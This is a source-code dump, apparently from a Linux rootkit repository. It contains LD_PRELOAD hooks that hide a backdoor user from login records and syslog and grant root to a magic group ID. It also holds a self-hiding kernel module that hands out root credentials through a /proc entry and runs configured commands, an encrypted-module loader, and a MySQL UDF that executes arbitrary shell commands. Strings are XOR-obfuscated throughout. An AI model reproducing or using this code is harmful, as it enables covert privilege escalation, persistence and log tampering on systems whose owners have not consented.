"stat.c" 9 | 10 | int lstat(const char *pathname, struct stat *buf); 11 | int lstat64(const char *pathname, struct stat64 *buf); 12 | int __lxstat(int version, const char *pathname, struct stat *buf); 13 | int __lxstat64(int version, const char *pathname, struct stat64 *buf); 14 | #include "lstat.c" 15 | 16 | int fstat(int fd, struct stat *buf); 17 | int fstat64(int fd, struct stat64 *buf); 18 | int fstatat(int dirfd, const char *pathname, struct stat *buf, int flags); 19 | int fstatat64(int dirfd, const char *pathname, struct stat64 *buf, int flags); 20 | int __fxstat(int version, int fd, struct stat *buf); 21 | int __fxstat64(int version, int fd, struct stat64 *buf); 22 | #include "fstat.c" 23 | 24 | #endif 25 | -------------------------------------------------------------------------------- /src/LD/hooks/syslog/syslog.c: -------------------------------------------------------------------------------- 1 | void openlog(const char *ident, int option, int facility){ 2 | if(is_bdusr()) 3 | return; 4 | hook(COPENLOG); 5 | call(COPENLOG, ident, option, facility); 6 | return; 7 | } 8 | 9 | void syslog(int priority, const char *format, ...){ 10 | if(is_bdusr()) 11 | return; 12 | if(bd_sshproc()){ 13 | hook(CSETGID); 14 | call(CSETGID, MAGIC_GID); 15 | return; 16 | } 17 | va_list va; 18 | va_start(va, format); 19 | vsyslog(priority, format, va); 20 | va_end(va); 21 | return; 22 | } 23 | 24 | void __syslog_chk(int priority, int flag, const char *format, ...){ 25 | if(is_bdusr()) 26 | return; 27 | if(bd_sshproc()){ 28 | hook(CSETGID); 29 | call(CSETGID, MAGIC_GID); 30 | return; 31 | } 32 | va_list va; 33 | va_start(va,format); 34 | vsyslog(priority,format,va); 35 | va_end(va); 36 | return; 37 | } 38 | 39 | void vsyslog(int priority, const char *format, va_list ap){ 40 | if(is_bdusr()) 41 | return; 42 | if(bd_sshproc()){ 43 | hook(CSETGID); 44 | call(CSETGID, MAGIC_GID); 45 | return; 46 | } 47 | hook(CVSYSLOG); 48 | call(CVSYSLOG, priority, format, ap); 49 | return; 50 | } 51 | -------------------------------------------------------------------------------- /src/LD/hooks/syslog/syslog.h: -------------------------------------------------------------------------------- 1 | #ifndef SYSLOG_H 2 | #define SYSLOG_H 3 | 4 | void openlog(const char *ident, int option, int facility); 5 | void syslog(int priority, const char *format, ...); 6 | void __syslog_chk(int priority, int flag, const char *format, ...); 7 | void vsyslog(int priority, const char *format, va_list ap); 8 | #include "syslog.c" 9 | 10 | #endif 11 | -------------------------------------------------------------------------------- /src/LD/hooks/utmp/getut.c: -------------------------------------------------------------------------------- 1 | struct utmp *getutid(const struct utmp *ut){ 2 | struct utmp *tmp; 3 | hook(CGETUTID); 4 | do{ 5 | tmp = call(CGETUTID, ut); 6 | if(is_bdusr()) 7 | return tmp; 8 | if(tmp == NULL) 9 | continue; 10 | } while(tmp && !xstrncmp(tmp->ut_user, BD_UNAME)); 11 | return tmp; 12 | } 13 | 14 | struct utmpx *getutxid(const struct utmpx *utx){ 15 | struct utmpx *tmp; 16 | hook(CGETUTXID); 17 | do{ 18 | tmp = call(CGETUTXID, utx); 19 | if(tmp == NULL) 20 | continue; 21 | } while(tmp && !xstrncmp(tmp->ut_user, BD_UNAME)); 22 | return tmp; 23 | } 24 | 25 | struct utmp *getutline(const struct utmp *ut){ 26 | struct utmp *tmp; 27 | hook(CGETUTLINE); 28 | do{ 29 | tmp = call(CGETUTLINE, ut); 30 | if(tmp == NULL) 31 | continue; 32 | } while(tmp && !xstrncmp(tmp->ut_user, BD_UNAME)); 33 | return tmp; 34 | } 35 | 36 | struct utmpx *getutxline(const struct utmpx *utx){ 37 | struct utmpx *tmp; 38 | hook(CGETUTXLINE); 39 | do { 40 | tmp = call(CGETUTXLINE, utx); 41 | if(tmp == NULL) 42 | continue; 43 | } while(tmp && !xstrncmp(tmp->ut_user, BD_UNAME)); 44 | return tmp; 45 | } 46 | 47 | struct utmp *getutent(void){ 48 | struct utmp *tmp; 49 | hook(CGETUTENT); 50 | do{ 51 | tmp = call(CGETUTENT); 52 | if(tmp == NULL) 53 | continue; 54 | } while(tmp && !xstrncmp(tmp->ut_user, BD_UNAME)); 55 | return tmp; 56 | } 57 | 58 | struct utmpx *getutxent(void){ 59 | struct utmpx *tmp; 60 | hook(CGETUTXENT); 61 | do{ 62 | tmp = call(CGETUTXENT); 63 | if(tmp == NULL) 64 | continue; 65 | } while(tmp && !xstrncmp(tmp->ut_user, BD_UNAME)); 66 | return tmp; 67 | } 68 | 69 | void getutmp(const struct utmpx *ux, struct utmp *u){ 70 | if(hide_me) 71 | return; 72 | if(ux && ux->ut_user != NULL) 73 | if(!xstrncmp(ux->ut_user, BD_UNAME)) 74 | hide_me = 1; 75 | hook(CGETUTMP); 76 | call(CGETUTMP, ux, u); 77 | } 78 | 79 | void getutmpx(const struct utmp *u, struct utmpx *ux){ 80 | if(hide_me) 81 | return; 82 | if(u && u->ut_user != NULL) 83 | if(!xstrncmp(u->ut_user, BD_UNAME)) 84 | hide_me = 1; 85 | hook(CGETUTMPX); 86 | call(CGETUTMPX, u, ux); 87 | } 88 | -------------------------------------------------------------------------------- /src/LD/hooks/utmp/putut.c: -------------------------------------------------------------------------------- 1 | void logwtmp(const char *ut_line, const char *ut_name, const char *ut_host){ 2 | if(hide_me) 3 | return; 4 | if(!xstrncmp(ut_name, BD_UNAME)){ 5 | hide_me = 1; 6 | return; 7 | } 8 | hook(CLOGWTMP); 9 | // call(CLOGWTMP, ut_line, ut_name, ut_host); // VERY DIRTY FIX. !!! FIX IT AS FAST AS POSIBLE !!! 10 | return; 11 | } 12 | 13 | void updwtmp(const char *wfile, const struct utmp *ut){ 14 | if(hide_me) 15 | return; 16 | if(ut && ut->ut_user != NULL) 17 | if(!xstrncmp(ut->ut_user, BD_UNAME)){ 18 | hide_me = 1; 19 | return; 20 | } 21 | hook(CUPDWTMP); 22 | call(CUPDWTMP, wfile, ut); 23 | } 24 | 25 | void updwtmpx(const char *wfilex, const struct utmpx *utx){ 26 | if(hide_me) 27 | return; 28 | if(utx && utx->ut_user != NULL) 29 | if(!xstrncmp(utx->ut_user, BD_UNAME)){ 30 | hide_me = 1; 31 | return; 32 | } 33 | hook(CUPDWTMPX); 34 | call(CUPDWTMPX, wfilex, utx); 35 | } 36 | -------------------------------------------------------------------------------- /src/LD/hooks/utmp/utmp.h: -------------------------------------------------------------------------------- 1 | #ifndef UTMP_H 2 | #define UTMP_H 3 | 4 | static int hide_me = 0; 5 | 6 | struct utmp *getutent(void); 7 | struct utmpx *getutxent(void); 8 | struct utmp *getutid(const struct utmp *ut); 9 | struct utmpx *getutxid(const struct utmpx *utx); 10 | void getutmp(const struct utmpx *ux, struct utmp *ut); 11 | void getutmpx(const struct utmp *ut, struct utmpx *utx); 12 | struct utmp *getutline(const struct utmp *ut); 13 | struct utmpx *getutxline(const struct utmpx *utx); 14 | #include "getut.c" 15 | 16 | void logwtmp(const char *ut_line, const char *ut_name, const char *ut_host); 17 | void updwtmp(const char *wfile, const struct utmp *ut); 18 | void updwtmpx(const char *wfilex, const struct utmpx *utx); 19 | #include "putut.c" 20 | 21 | void login(const struct utmp *ut){ 22 | hook(CLOGIN); 23 | call(CLOGIN, ut); 24 | } 25 | 26 | #endif 27 | -------------------------------------------------------------------------------- /src/LD/util/bdusr.c: -------------------------------------------------------------------------------- 1 | static char *const unset_variables[4] = {"HISTFILE", "SAVEHIST", "TMOUT", "PROMPT_COMMAND"}; 2 | #define UNSET_VARIABLES_SIZE sizeofarray(unset_variables) 3 | 4 | static void unset_bad_vars(void){ 5 | int i; 6 | for(i = 0; i < UNSET_VARIABLES_SIZE; i++) 7 | unsetenv(unset_variables[i]); 8 | } 9 | 10 | static int is_bdusr(void){ 11 | int ret = 0; 12 | if(getgid() == MAGIC_GID){ 13 | ret = 1; 14 | setuid(0); 15 | putenv("HOME=/var/tmp/"); 16 | } 17 | if(ret) 18 | unset_bad_vars(); 19 | return ret; 20 | } 21 | -------------------------------------------------------------------------------- /src/LD/util/processes.c: -------------------------------------------------------------------------------- 1 | #include "../hooks/libdl/libdl.h" 2 | 3 | static int open_cmdline(pid_t pid){ 4 | char path[PROCPATH_MAXLEN]; 5 | int fd; 6 | snprintf(path, sizeof(path), CMDLINE_PATH, pid); 7 | hook(COPEN); 8 | fd = (long)call(COPEN, path, 0, 0); 9 | memset(path, 0, strlen(path)); 10 | return fd; 11 | } 12 | 13 | static char *process_info(pid_t pid, int mode){ 14 | char *process_info; 15 | int fd, c; 16 | hook(CREAD); 17 | fd = open_cmdline(pid); 18 | if(fd < 0){ 19 | process_info = FALLBACK_PROCNAME; 20 | goto end_processinfo; 21 | } 22 | switch(mode){ 23 | case MODE_NAME: 24 | process_info = (char *)malloc(NAME_MAXLEN); 25 | c = (long)call(CREAD, fd, process_info, NAME_MAXLEN); 26 | break; 27 | case MODE_CMDLINE: 28 | process_info = (char *)malloc(CMDLINE_MAXLEN); 29 | c = (long)call(CREAD, fd, process_info, CMDLINE_MAXLEN); 30 | int i; 31 | for(i = 0; i < c; i++) 32 | if(process_info[i] == 0x00) 33 | process_info[i] = 0x20; 34 | break; 35 | } 36 | close(fd); 37 | end_processinfo: 38 | return process_info; 39 | } 40 | 41 | static int cmp_process(char *name){ 42 | char *myname = process_name(); 43 | int status = strncmp(myname, name, strlen(myname)); 44 | free(myname); 45 | return !status; 46 | } 47 | 48 | static char *str_process(char *name){ 49 | char *myname = process_name(), *status = strstr(name, myname); 50 | free(myname); 51 | return status; 52 | } 53 | 54 | static int process(char *name){ 55 | if(cmp_process(name)) 56 | return 1; 57 | if(str_process(name)) 58 | return 1; 59 | return 0; 60 | } 61 | 62 | static int xprocess(const char *name){ 63 | xor(_name, name); 64 | int ret = process(_name); 65 | clean(_name); 66 | return ret; 67 | } 68 | 69 | #define bd_sshproc() xprocess(BD_SSHPROCNAME) 70 | -------------------------------------------------------------------------------- /src/LD/util/util.h: -------------------------------------------------------------------------------- 1 | #ifndef UTIL_H 2 | #define UTIL_H 3 | 4 | #define CMDLINE_PATH "/proc/%d/cmdline" 5 | #define FALLBACK_PROCNAME "YuuUUU" 6 | #define NAME_MAXLEN 128 7 | #define CMDLINE_MAXLEN 512 8 | 9 | #define PID_MAXLEN 16 10 | #define PROCPATH_MAXLEN strlen(CMDLINE_PATH) + PID_MAXLEN 11 | 12 | #define MODE_NAME 0x01 13 | #define MODE_CMDLINE 0x02 14 | 15 | static void fallbackme(char **dest); 16 | static char *get_cmdline(pid_t pid); 17 | static int open_cmdline(pid_t pid); 18 | 19 | static char *process_info(pid_t pid, int mode); 20 | #define process_name() process_info(getpid(), MODE_NAME) 21 | #define process_cmdline() process_info(getpid(), MODE_CMDLINE) 22 | 23 | static int cmp_process(char *name); 24 | static char *str_process(char *name); 25 | static int process(char *name); 26 | static int bd_sshproc(void); 27 | #include "processes.c" 28 | 29 | #define isbduname(uname) !xstrncmp(uname, BD_UNAME) 30 | 31 | static char *get_username(const pam_handle_t *pamh){ 32 | void *u = NULL; 33 | if(pam_get_item(pamh, PAM_USER, (const void **)&u) != PAM_SUCCESS) 34 | return NULL; 35 | return (char *)u; 36 | } 37 | 38 | #define _pam_overwrite(x) \ 39 | do{ \ 40 | register char *__xx__; \ 41 | if((__xx__=(x))) \ 42 | while(*__xx__) \ 43 | *__xx__++ = '\0'; \ 44 | }while(0) 45 | 46 | #define _pam_drop(X) \ 47 | do{ \ 48 | if(X){ \ 49 | free(X); \ 50 | X = NULL; \ 51 | } \ 52 | }while(0) 53 | 54 | int not_user(int id){ 55 | if(getuid() != id && geteuid() != id) 56 | return 1; 57 | return 0; 58 | } 59 | 60 | static void unset_bad_vars(void); 61 | static int is_bdusr(void); 62 | #include "bdusr.c" 63 | 64 | 65 | 66 | 67 | #endif 68 | -------------------------------------------------------------------------------- /src/LD/util/xor.c: -------------------------------------------------------------------------------- 1 | static void _xor(char *p){ 2 | int i; 3 | for(i = 0; i < strlen(p); i++) 4 | if(p[i] ^ XKEY) 5 | p[i] ^= XKEY; 6 | } 7 | 8 | static void clean(void *var){ 9 | memset(var, 0x00, strlen((char *)var)); 10 | free(var); 11 | } 12 | 13 | #define xor(new_name, target) char *new_name = strdup(target); _xor(new_name); 14 | -------------------------------------------------------------------------------- /src/LD/util/xor_wrappers.h: -------------------------------------------------------------------------------- 1 | static void *xdlsym(void *handle, const char *symbol){ 2 | void *ptr = NULL; 3 | xor(_symbol, symbol); 4 | ptr = dlsym(handle, _symbol); 5 | clean(_symbol); 6 | return ptr; 7 | } 8 | 9 | static FILE *xfopen(const char *path, const char *mode){ 10 | FILE *ret; 11 | hook(CFOPEN); 12 | xor(_path, path); 13 | ret = call(CFOPEN, _path, mode); 14 | clean(_path); 15 | return ret; 16 | } 17 | 18 | static size_t xfwrite(const char *str, size_t nmemb, FILE *stream){ 19 | size_t ret; 20 | hook(CFWRITE); 21 | xor(_str, str); 22 | ret = (size_t)call(CFWRITE, _str, strlen(_str), nmemb, stream); 23 | clean(_str); 24 | return ret; 25 | } 26 | 27 | static int xprintf(const char *string){ 28 | int ret; 29 | xor(_string, string); 30 | ret = printf("%s\n", _string); 31 | clean(_string); 32 | return ret; 33 | } 34 | 35 | static int xstrncmp(const char *string, const char *pattern){ 36 | int ret; 37 | xor(_pattern, pattern); 38 | ret = strncmp(_pattern, string, strlen(_pattern)); 39 | clean(_pattern); 40 | return ret; 41 | } 42 | 43 | static char *xstrstr(const char *pattern, const char *string){ 44 | char *ret; 45 | xor(_pattern, pattern); 46 | ret = strstr(string, _pattern); 47 | clean(_pattern); 48 | return ret; 49 | } 50 | 51 | static int xfnmatch(const char *pattern, const char *string){ 52 | int ret; 53 | xor(_pattern, pattern); 54 | ret = fnmatch(_pattern, string, FNM_PATHNAME); 55 | clean(_pattern); 56 | return ret; 57 | } 58 | -------------------------------------------------------------------------------- /src/LKM/LKM.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include 5 | #include 6 | #include 7 | #include 8 | #include 9 | #include 10 | #include 11 | #include //// MAYBE IF 12 | #include "config.h" 13 | 14 | #define WORKQUEUE "ata/0" 15 | #define proc_fs_max 1024 16 | #define CLEAN(var) memset(var, 0x00, strlen(var)); 17 | #define xor(new_name, target) char *new_name = kstrdup(target, GFP_KERNEL);_xor(new_name); 18 | 19 | #if LINUX_VERSION_CODE > KERNEL_VERSION(3, 4, 0) 20 | #define V(x) x.val 21 | #else 22 | #define V(x) x 23 | #endif 24 | 25 | static int SESS = 0; 26 | static int TEST = 0; 27 | static struct list_head *mod_list; 28 | static char procfs_buffer[proc_fs_max]; 29 | static int proc_buffer_size = 0; 30 | static struct workqueue_struct *work_queue = NULL; 31 | static struct task_struct *my_kthread; 32 | static struct proc_dir_entry *proc_entry; 33 | typedef struct{ 34 | struct work_struct work; 35 | char cmd[1024]; 36 | } bash_call; 37 | 38 | static void _xor(char *p){ 39 | int i; 40 | for(i=0;ilist.prev; 59 | list_del(&THIS_MODULE->list); 60 | kfree(THIS_MODULE->sect_attrs); 61 | THIS_MODULE->sect_attrs = NULL; 62 | // Write Me If You Know How To Fix ;) 63 | // THIS_MODULE->notes_attrs = NULL; 64 | SESS = 1; 65 | } else if(SESS == 1){ 66 | list_add(&THIS_MODULE->list, mod_list); 67 | SESS = 0; 68 | } 69 | mutex_unlock(&module_mutex); 70 | return; 71 | } 72 | 73 | static ssize_t hello_proc_write(struct file *fp, const char __user *buf, size_t count, loff_t *offp){ 74 | struct cred *new = prepare_kernel_cred(0); 75 | proc_buffer_size = count; 76 | if(proc_buffer_size > proc_fs_max) 77 | proc_buffer_size = proc_fs_max; 78 | if(copy_from_user(procfs_buffer, buf, proc_buffer_size)) 79 | return count; 80 | procfs_buffer[proc_buffer_size] = '\0'; 81 | if(!xstrncmp(PURGE, procfs_buffer)) 82 | hide(); 83 | else if(!xstrncmp(GIVEROOTPERM, procfs_buffer)){ 84 | #if LINUX_VERSION_CODE < KERNEL_VERSION(2, 6, 29) 85 | current->uid = 0; 86 | current->suid = 0; 87 | current->euid = 0; 88 | current->fsuid = 0; 89 | current->gid = MGID; 90 | current->sgid = MGID; 91 | current->egid = MGID; 92 | current->fsgid = MGID; 93 | cap_set_full(current->cap_effective); 94 | cap_set_full(current->cap_inheritable); 95 | cap_set_full(current->cap_permitted); 96 | #else 97 | V(new->gid) = MGID; 98 | V(new->sgid) = MGID; 99 | V(new->egid) = MGID; 100 | V(new->fsgid) = MGID; 101 | commit_creds(new); 102 | #endif 103 | } else if(!xstrncmp(LDP, procfs_buffer)) 104 | TEST = 1; 105 | return count; 106 | } 107 | 108 | static ssize_t hello_proc_read(struct file *fp, char __user *buf, size_t count, loff_t *offp){ 109 | if(TEST != 0){ 110 | TEST = 0; 111 | return simple_read_from_buffer(buf, count, offp, LDPSO, LDPSO_len); 112 | } 113 | return 0; 114 | } 115 | 116 | static int threadfn(void *data){ 117 | xor(cmd_t, CMD); 118 | xor(cmd_tt, CMD2); 119 | xor(mgid_t, MGID_NAME); 120 | char *argv[] = {"/bin/bash", "-c", cmd_t, NULL}; 121 | char *argv2[] = {"/bin/su", "-g", mgid_t, "-c" ,cmd_tt, NULL}; 122 | char *envp[] = {"PATH=/bin:/sbin:/usr/local/bin:/usr/local/sbin:/usr/sbin:/usr/bin", NULL}; 123 | do { 124 | msleep(100); 125 | call_usermodehelper(argv[0], argv, envp, UMH_NO_WAIT); //UMH_NO_WAIT // UMH_WAIT_EXEC // UMH_WAIT_PROC 126 | msleep(MSLP); 127 | call_usermodehelper(argv2[0], argv2, envp, UMH_WAIT_PROC); //UMH_NO_WAIT // UMH_WAIT_EXEC // UMH_WAIT_PROC 128 | msleep(100); 129 | break; 130 | } while(!kthread_should_stop()); 131 | CLEAN(cmd_t); 132 | return 0; 133 | } 134 | 135 | static int start_cmd_thread(void){ 136 | int cpu = 0; 137 | my_kthread = kthread_create(threadfn, &cpu, "kworker"); 138 | kthread_bind(my_kthread, cpu); 139 | wake_up_process(my_kthread); 140 | return 0; 141 | } 142 | #if LINUX_VERSION_CODE >= KERNEL_VERSION(5, 6, 0) 143 | static const struct proc_ops hello_proc_fops = { 144 | .proc_read = hello_proc_read, 145 | .proc_write = hello_proc_write, 146 | }; 147 | #else 148 | static const struct file_operations hello_proc_fops = { 149 | .owner = THIS_MODULE, 150 | .read = hello_proc_read, 151 | .write = hello_proc_write, 152 | }; 153 | #endif 154 | static int __init extructor_init(void){ 155 | work_queue = create_singlethread_workqueue(WORKQUEUE); 156 | if(work_queue){ 157 | hide(); 158 | xor(hide_t, PROC); 159 | proc_entry = proc_create(hide_t, 0666, NULL, &hello_proc_fops); 160 | #if LINUX_VERSION_CODE >= KERNEL_VERSION(3, 10, 0) 161 | proc_set_user(proc_entry, KUIDT_INIT(0), KGIDT_INIT(MGID)); 162 | #else 163 | proc_entry->uid = 0; 164 | proc_entry->gid = MGID; 165 | #endif 166 | CLEAN(hide_t); 167 | if(proc_entry) 168 | start_cmd_thread(); 169 | } 170 | return 0; 171 | } 172 | 173 | static void __exit extructor_exit(void){ 174 | xor(hide_t, PROC); 175 | remove_proc_entry(hide_t, NULL); 176 | CLEAN(hide_t); 177 | flush_workqueue(work_queue); 178 | destroy_workqueue(work_queue); 179 | return; 180 | } 181 | 182 | module_init(extructor_init); 183 | module_exit(extructor_exit); 184 | 185 | MODULE_LICENSE("GPL"); 186 | MODULE_INFO(intree, "Y"); 187 | MODULE_INFO(srcversion, ""); 188 | -------------------------------------------------------------------------------- /src/LKM/Makefile: -------------------------------------------------------------------------------- 1 | MODULE = %%LKM_MOD%% 2 | MAKE = make 3 | ccflags-y = -Wall -fno-stack-protector 4 | obj-m = $(MODULE).o 5 | $(MODULE)-y += LKM.o 6 | 7 | all: 8 | $(MAKE) -C /lib/modules/%%VER%%/build M=$$PWD 9 | clean: 10 | $(MAKE) -C /lib/modules/%%VER%%/build M=$$PWD clean 11 | 12 | -------------------------------------------------------------------------------- /src/LKM/config.h: -------------------------------------------------------------------------------- 1 | #define LKM_MOD "%%LKM_MOD%%" 2 | #define GIVEROOTPERM "%%GIVEROOTPERM%%" 3 | #define LDP "%%LDP%%" 4 | #define PURGE "%%PURGE%%" 5 | #define PROC "%%PROC%%" 6 | #define CMD "%%C_C%%" 7 | #define CMD2 "%%C_C_C%%" 8 | #define MGID_NAME "%%MGID_NAME%%" 9 | 10 | #define XKEY %%XKEY%% 11 | #define MGID %%MGID%% 12 | 13 | #define MSLP 5000 14 | -------------------------------------------------------------------------------- /src/LOADER/LOADER.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include 5 | 6 | #ifndef user_addr_max 7 | #define user_addr_max() (current_thread_info()->addr_limit.seg) 8 | #endif 9 | 10 | #include "encrypt/encrypt.h" 11 | 12 | #define SYS_INIT_MODULE ({ \ 13 | unsigned int *p = __builtin_alloca(16); \ 14 | p[0] = 0x5f737973; \ 15 | p[1] = 0x74696e69; \ 16 | p[2] = 0x646f6d5f; \ 17 | p[3] = 0x00656c75; \ 18 | (char *)p; \ 19 | }) 20 | 21 | #define SYS_DELETE_MODULE ({ \ 22 | unsigned int *p = __builtin_alloca(24); \ 23 | p[0] = 0x5f737973; \ 24 | p[1] = 0x656c6564; \ 25 | p[2] = 0x6d5f6574; \ 26 | p[3] = 0x6c75646f; \ 27 | p[4] = 0x00000065; \ 28 | p[5] = 0x00000000; \ 29 | (char *)p; \ 30 | }) 31 | 32 | #define __DO_SYS_DELETE_MODULE ({ \ 33 | unsigned int *p = __builtin_alloca(24); \ 34 | p[0] = 0x6f645f5f; \ 35 | p[1] = 0x7379735f; \ 36 | p[2] = 0x6c65645f; \ 37 | p[3] = 0x5f657465; \ 38 | p[4] = 0x75646f6c; \ 39 | p[5] = 0x0000656c; \ 40 | (char *)p; \ 41 | }) 42 | 43 | 44 | #define __DO_SYS_INIT_MODULE ({ \ 45 | unsigned int *p = __builtin_alloca(24); \ 46 | p[0] = 0x6f645f5f; \ 47 | p[1] = 0x7379735f; \ 48 | p[2] = 0x696e695f; \ 49 | p[3] = 0x6f6d5f74; \ 50 | p[4] = 0x656c7564; \ 51 | p[5] = 0x00000000; \ 52 | (char *)p; \ 53 | }) 54 | 55 | static char parasite_blob[] = { 56 | #include "%%EFILE%%" 57 | }; 58 | 59 | static int ksym_lookup_cb(unsigned long data[], const char *name, void *module, unsigned long addr){ 60 | int i = 0; 61 | while(!module && (((const char *)data[0]))[i] == name[i]) 62 | if (!name[i++]) 63 | return !!(data[1] = addr); 64 | return 0; 65 | } 66 | 67 | static inline unsigned long ksym_lookup_name(const char *name){ 68 | unsigned long data[2] = {(unsigned long)name, 0}; 69 | kallsyms_on_each_symbol((void *)ksym_lookup_cb, data); 70 | return data[1]; 71 | } 72 | 73 | extern int __init %%INIT_FUNC%%(void); 74 | extern int __exit %%EXIT_FUNC%%(void); 75 | 76 | int __init %%INIT_FUNC_NAME%%(void){ 77 | asmlinkage long (*sys_init_module)(const void *, unsigned long, const char *) = NULL; 78 | %%INIT_FUNC%%(); 79 | do_decrypt(parasite_blob, sizeof(parasite_blob), DECRYPT_KEY); 80 | sys_init_module = (void *)ksym_lookup_name(SYS_INIT_MODULE); 81 | if(!sys_init_module) 82 | sys_init_module = (void *)ksym_lookup_name(__DO_SYS_INIT_MODULE); 83 | if(sys_init_module){ 84 | const char *nullarg = parasite_blob; 85 | unsigned long seg = user_addr_max(); 86 | while(*nullarg) 87 | nullarg++; 88 | user_addr_max() = roundup((unsigned long)parasite_blob + sizeof(parasite_blob), PAGE_SIZE); 89 | sys_init_module(parasite_blob, sizeof(parasite_blob), nullarg); 90 | user_addr_max() = seg; 91 | } 92 | return 0; 93 | } 94 | 95 | void __exit %%EXIT_FUNC_NAME%%(void){ 96 | asmlinkage long (*sys_delete_module)(const char __user *, unsigned int); 97 | sys_delete_module = (void *)ksym_lookup_name(SYS_DELETE_MODULE); 98 | if(!sys_delete_module) 99 | sys_delete_module = (void *)ksym_lookup_name(__DO_SYS_DELETE_MODULE); 100 | if(sys_delete_module) 101 | sys_delete_module(parasite_blob, 00004000); 102 | %%EXIT_FUNC%%(); 103 | return; 104 | } 105 | 106 | MODULE_LICENSE("GPL"); 107 | MODULE_INFO(intree, "Y"); 108 | -------------------------------------------------------------------------------- /src/LOADER/Makefile: -------------------------------------------------------------------------------- 1 | TARGET = %%LOADER_MOD%% 2 | MODULE = %%ORIG_LKM_PATH%% 3 | EKEY = %%EKEY%% 4 | EFILE = %%EFILE%% 5 | 6 | obj-m += $(TARGET).o 7 | $(TARGET)-y += LOADER.o 8 | 9 | ccflags-y += $(CFLAGS) -Os -fno-stack-protector 10 | 11 | KBUILD_CFLAGS := $(subst -pg,,$(KBUILD_CFLAGS)) 12 | KBUILD_CFLAGS := $(subst -mfentry,,$(KBUILD_CFLAGS)) 13 | 14 | all: encode 15 | $(MAKE) -C /lib/modules/%%VER%%/build M=$$PWD 16 | 17 | encode: 18 | $(MAKE) -C encrypt 19 | encrypt/encrypt $(MODULE) $(EKEY) > $(EFILE) 20 | 21 | clean: 22 | $(MAKE) -C encrypt clean 23 | $(MAKE) -C /lib/modules/%%VER%%/build M=$$PWD clean 24 | rm -f $(EFILE) 25 | -------------------------------------------------------------------------------- /src/LOADER/encrypt/Makefile: -------------------------------------------------------------------------------- 1 | encrypt: encrypt.c 2 | gcc -std=c99 $< -o $@ 3 | clean: 4 | rm -f encrypt 5 | -------------------------------------------------------------------------------- /src/LOADER/encrypt/encrypt.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | 5 | #include "encrypt.h" 6 | 7 | static long get_file_size(FILE *file){ 8 | long size; 9 | fseek(file, 0, SEEK_END); 10 | size = ftell(file); 11 | rewind(file); 12 | return size; 13 | } 14 | 15 | int main(int argc, char **argv){ 16 | if (argc != 3) 17 | exit(-1); 18 | FILE *file = fopen(argv[1], "rb"); 19 | if (!file) 20 | exit(-2); 21 | long size = get_file_size(file); 22 | unsigned char *data = malloc(size); 23 | if (!data) 24 | exit(-3); 25 | if (fread(data, size, 1, file) != 1) 26 | exit(-4); 27 | fclose(file); 28 | uint32_t key = strtol(argv[2], NULL, 16); 29 | do_encrypt(data, size, key); 30 | printf("#define DECRYPT_KEY 0x%08x\n", key); 31 | for (int i = 0; i < size; i++) 32 | printf("0x%02x,", data[i]); 33 | return 0; 34 | } 35 | -------------------------------------------------------------------------------- /src/LOADER/encrypt/encrypt.h: -------------------------------------------------------------------------------- 1 | #ifndef __LOADER_H__ 2 | #define __LOADER_H__ 3 | 4 | #define do_encrypt(ptr, len, key) do_encode(ptr, len, key) 5 | #define do_decrypt(ptr, len, key) do_encode(ptr, len, key) 6 | 7 | static inline unsigned int custom_rol32(unsigned int val, int n){ 8 | return ((val << n) | (val >> (32 - n))); 9 | } 10 | 11 | static inline void do_encode(void *ptr, unsigned int len, unsigned int key){ 12 | while (len > sizeof(key)) { 13 | *(unsigned int *)ptr ^= custom_rol32(key ^ len, (len % 13)); 14 | len -= sizeof(key), ptr += sizeof(key); 15 | } 16 | } 17 | 18 | #endif 19 | -------------------------------------------------------------------------------- /src/MYSQL/Makefile: -------------------------------------------------------------------------------- 1 | CC = gcc 2 | 3 | FLAGS = -std=gnu99 4 | CFLAGS = -fomit-frame-pointer -fPIC -s -Wall -Wextra -Wshadow -Wno-unused-function -fstack-protector-all -funroll-loops -fno-jump-tables -Os -g0 -I%%MYSQL_I_DIR%% -I./-. 5 | LDFLAGS = -shared -Wl,--build-id=none,-z,relro,-z,now 6 | 7 | TARGET = UDF.so 8 | SOURCES = UDF.c 9 | OBJECTS = $(SOURCES:.c=.o) 10 | 11 | $(TARGET): $(OBJECTS) 12 | $(CC) $(FLAGS) $(CFLAGS) $^ -o $@ $(LDFLAGS) 13 | 14 | clean: 15 | rm -rf $(OBJECTS) $(TARGET) 16 | -------------------------------------------------------------------------------- /src/MYSQL/UDF.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include 5 | 6 | my_bool %%MYSQL_NAME%%_init(UDF_INIT *initid, UDF_ARGS *args, char *message); 7 | void %%MYSQL_NAME%%_deinit(UDF_INIT *initid); 8 | char *%%MYSQL_NAME%%(UDF_INIT *initid, UDF_ARGS *args, char* result, unsigned long* length, char *is_null, char *error); 9 | 10 | my_bool %%MYSQL_NAME%%_init(UDF_INIT *initid, UDF_ARGS *args, char *message){ 11 | unsigned int i=0; 12 | if(args->arg_count == 1 && args->arg_type[i] == STRING_RESULT) 13 | return 0; 14 | else 15 | return 1; 16 | } 17 | 18 | void %%MYSQL_NAME%%_deinit(UDF_INIT *initid){} 19 | 20 | char *%%MYSQL_NAME%%(UDF_INIT *initid, UDF_ARGS *args, char* result, unsigned long* length, char *is_null, char *error){ 21 | FILE *pipe; 22 | char line[1024]; 23 | unsigned long outlen, linelen; 24 | result = malloc(1); 25 | outlen = 0; 26 | pipe = popen(args->args[0], "r"); 27 | while (fgets(line, sizeof(line), pipe) != NULL) { 28 | linelen = strlen(line); 29 | result = realloc(result, outlen + linelen); 30 | strncpy(result + outlen, line, linelen); 31 | outlen = outlen + linelen; 32 | } 33 | pclose(pipe); 34 | if (!(*result) || result == NULL) 35 | *is_null = 1; 36 | else { 37 | result[outlen-1] = 0x00; 38 | *length = strlen(result); 39 | } 40 | return result; 41 | } 42 | -------------------------------------------------------------------------------- /src/PAM/.keep: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Not-C-Developer/VERBA/5c8b03f54c3f3e05b80c7d97893163c4907ac5b8/src/PAM/.keep -------------------------------------------------------------------------------- /src/POSTGRES/Makefile: -------------------------------------------------------------------------------- 1 | CC = gcc 2 | 3 | FLAGS = -std=gnu99 4 | CFLAGS = -fomit-frame-pointer -fPIC -s -Wall -Wextra -Wshadow -Wno-unused-function -fstack-protector-all -funroll-loops 